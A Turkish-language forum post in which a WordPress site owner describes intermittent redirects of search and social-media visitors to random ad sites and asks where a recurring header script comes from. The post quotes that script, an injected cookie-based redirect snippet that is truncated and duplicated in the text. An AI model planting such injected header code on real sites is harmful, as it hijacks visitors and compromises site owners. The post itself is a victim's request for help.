Merhabalar,

Forumda yeniyim, hepinizi selamlıyorum.

Web sitemde 1 aydır çözemediğim bir sorunla karşı karşıyayım.
- Herhangi bir link üzerinden veya arama motorundan tıklayarak web siteme erişilmek istendiğinde -değişken zaman aralıklarında- reklam sitelerine yönleniyor.
- Her seferinde değil ama bir cihazdan ilk defa girildiğinde reklam sitesine yönleniyor. Sonra o cihazdan uzun bir süre yönlenmeden linke tıklayıp girilebiliyor. Bir zaman sonra tekrar yönlendirme yapabiliyor.
- İşin enteresan yanı, örneğin Facebook'ta web sitemden paylaştığım bir linke tıklayınca bazen reklam sitesine yönleniyor, bazen yönlenmiyor.
- Yönlendirilen web siteleri, adresler ve reklam sayfaları sabit değil. Her seferinde farklı farklı, rastgele çıkıyor.
- Adres çubuğundan site adını yazarak giriş yapıldığında hiçbir zaman yönlendirme yapmıyor. Daima sorunsuz giriyor.
- Sunucuyu değiştirdim, çözülmedi.
- Worpress'i silip tekrar yükledim, çözülmedi.
- Web sitesini silip tekrar yükledim, çözülmedi.
- Kullandığım tema ThemeForest'tan satın alındı ve diğer kullananlarda bu sorun yok.
- Eklentilerimin hepsi de Wordpress mağazadan panel aracılığıyla yüklendi. Hepsi de popüler ve güvenilir.

Ayrıca header'da bir kod oluşuyor sürekli, silsem de geri geliyor. Nerden geliyor olabilir?

<script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<' + '/script>')));</script><script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<' + '/script>')));</script>

Yardımlarınızı bekliyorum. Çok teşekkür ederim.